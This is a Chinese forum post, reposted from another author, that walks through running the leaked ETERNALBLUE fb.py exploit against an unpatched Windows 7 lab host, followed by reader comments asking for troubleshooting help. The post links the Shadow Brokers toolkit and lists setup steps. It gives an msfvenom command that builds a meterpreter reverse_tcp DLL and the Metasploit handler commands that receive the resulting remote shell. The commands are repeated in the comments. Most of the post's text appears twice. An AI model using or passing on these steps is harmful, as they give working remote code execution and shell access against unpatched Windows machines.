方程式ETERNALBLUE 之fb.py的复现
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
关于作者
评论135次
安装环境中,先mark 感觉贼劲爆啊
表哥帮忙看一下这个是什么问题?
这docx文档不敢开啊,生怕弹个计算器
弹个小电影就够了,哈哈
请教一下,msf生成的恶意dll为空,有办法解决吗?使用的命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > /opt/s.dll
竟然0,一般都是在5KB左右,你可以尝试用远控的dll啊,之类的这种dll试试看。
3389那个Esteemaudittouch咋用???
3389的后续会出
我这个是i什么情况 运行python fd.py 出现:python: can't open file 'fd.py': No such file or directory
安装python2.6了吗?必须用32位的python2.6
这docx文档不敢开啊,生怕弹个计算器
不会弹计算器,弹一个cmd,嘿嘿
又到了运维加班的季节
这docx文档不敢开啊,生怕弹个计算器
这docx文档不敢开啊,生怕弹个计算器
23333差点想起来了前两天出现的office0DAY
6666多谢大神思路,还有很多工具也不知道怎么用
这docx文档不敢开啊,生怕弹个计算器
写的非常细致,基本上小白都能直接学xi使用了,大赞!期待牛人出3389那个传说中的神洞
我这个是i什么情况 运行python fd.py 出现:python: can't open file 'fd.py': [Errno 2] No such file or directory
请教一下,msf生成的恶意dll为空,有办法解决吗? 使用的命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > /opt/s.dll
用这个方式,本地测试成功
Error connecting to target CORE terminated with status code 0xdf5d000b Error getting output back from Core; aborting... Plugin failed Error: Eternalblue Failed插件失败什么情况
说明不存在这个漏洞
不太会用这个工具包,测试失败,提示 Packet MID is zero, backdoor not present楼主请问这个怎么解决
执行脚本出现的这个还是?方便上个图吗
多谢楼主。可能配置步骤有问题,试了几次后攻击完成后1分钟重启了,应该是注入xi统进程了
好的。
[-] Error connecting to target [+] CORE terminated with status code 0xdf5d000b [-] Error getting output back from Core; aborting... [!] Plugin failed [-] Error: Eternalblue Failed 插件失败什么情况